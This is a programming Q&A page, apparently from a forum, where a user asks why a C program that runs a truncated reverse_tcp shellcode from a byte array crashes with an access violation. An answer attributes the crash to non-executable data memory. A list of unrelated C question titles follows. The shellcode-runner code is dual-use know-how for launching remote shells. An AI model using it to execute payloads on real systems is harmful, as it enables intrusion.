Executing shellcode in C (visual studio 2017
I encounter a problem when I try to execute a shellcode in C, (a basic reverse_tcp, pointing to a local address).
I started from the basics with the following code:
#define WIN32_LEAN_AND_MEAN
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main(int argc, char * argv[])
{
unsigned char shellcode[] = \
"\xfd\xab\xd2\xa9\xb1\x29\xe0\xdd\x38\x64\x51\x24\x9d\x0f\xdf"
"\x8a\xc2\x01\x0d\x2e\x6c\x9b\x86\xa9\x2e\x6f\xd9\xb3\x04\x4a"
"\x35\x1c\x0a\xc6\xe7\x18\xf4\xaf\x3e\xed\x4b\x5c\x1a\x08\x8b"
"\x71\x27\x5e\x20\xd1\x4d\xaf\x8f\x2d\x23\xe1\x68\x25\xf3\x19"
"\xd2\x7b\x5e\xca\x26\x2a\xc7\xa0\x98\x64\x72\x7b\x03\x05\xf0"
"\x46\x03\xdf\x19\x86\xfb\x04\xd0\x7d\xd9\xf8\xa0\xfb\x8c\xa0"
"\x2d\xb2\xcb\x7f\xde\x7c\xc4\xd4\xe6\x94\xde\x56\x81\x53\xfc"
"\x59\xe3\xfc\xb6\x7d\x50\x7e\xde\x6d\xf0\x8a\x33\x35\x99\xfc"
"\x66\x0c\x45\xf0\xdc\xcb\x49\x4d\xa1\x2f\xd7\xaf\x59\xdc\xcf"
"\x90\x8b\xd3\x7c\xb7\x7e\x6f\xa8\x15\xe4\x1d\xfd\xc2\xe7\x9d"
"\x15\x88\x8b\xfb\x3b\x30\x1d\x41\xe6\x22\xdf\x3f\x4f\xb8\xe3"
"\x65\x0d\xa8\xc1\x0a\x2d\xe9\x77\x7d\x84\x83\xa7\xfc\x29\x80"
"\x72\xcd\xcc\x68\xa1\x08\x35\xda\xba\x01\xe2\xe5\x01\xe9\x05"
;
int(*ret)() = (int(*)())shellcode;
ret();
}
return 1;
}
(I cut the shellcode for the example) when I compile this .c file with visual studio community 2017, I get a few warnings about argv and argc that aren't used, and conversion from () to (void) in ret.
Then I try to execute the file, and i get an awesome "has stopped working". So I launch the debug in visual studio,and here is what i get:
So this is an access violation error, but why? I searched on google, and it seems that this error can have many causes, but I can't figure why it happens to me.
You normally can't execute code in the .data section of an executable on Windows. The access violation occurs because you're trying to run code that isn't executable.
https://msdn.microsoft.com/en-us/library/windows/desktop/aa366553(v=vs.85).aspx
- How do I convert argv to lpCommandLine parameter of CreateProcess?
- How to calulate CRC of 1 byte using stm32l1 CRC unit
- Can't put values together into struct that is initiated by pointer and malloc
- Using TinyAES to encrypt a decrypt data returns a strange result
- What causes the error "undefined reference to (some function)"?
- What is the difference between memmove and memcpy?
- C compiler for Windows?
- How to setup a shared ccache
- Checking stack usage at compile time
- Static assertion to check if a variable name is defined in the current scope
- Trying to read txt file line by line in C Language
- How do you do exponentiation in C?
- Is it possible to modify the content of a struct pointer inside a function?
- Programmatically retrieving the absolute path of an OS X command-line app
- Should Portable Types Be Used in the Declaration of a Main Function? (C11)
- GCC Linker, bss section symbols equal zero length
- Is there any reasonable initial/invalid value for a pid_t?
- Fork in Linux: Weird infinite loop while freeing condition variable
- Function definition with prototype vs without prototype
- How do I achieve tilde expansion in C?
- Is there really no mremap in Darwin?
- Interpreting the format specifier in printf("%.-1f", 34.14)
- Why is my socket's open port not listed by netstat?
- Why I get bus-error with unused FILE pointer?
- How does strcmp() work?
- Rationale behind declaring FILE * volatile to stdin in C
- Getting actual file name (with proper casing) on Windows
- Is it possible to make a C++ application and use Flutter as the GUI framework?
- Difference between char* and const char*?
- How can I make switch-case statements case insensitive?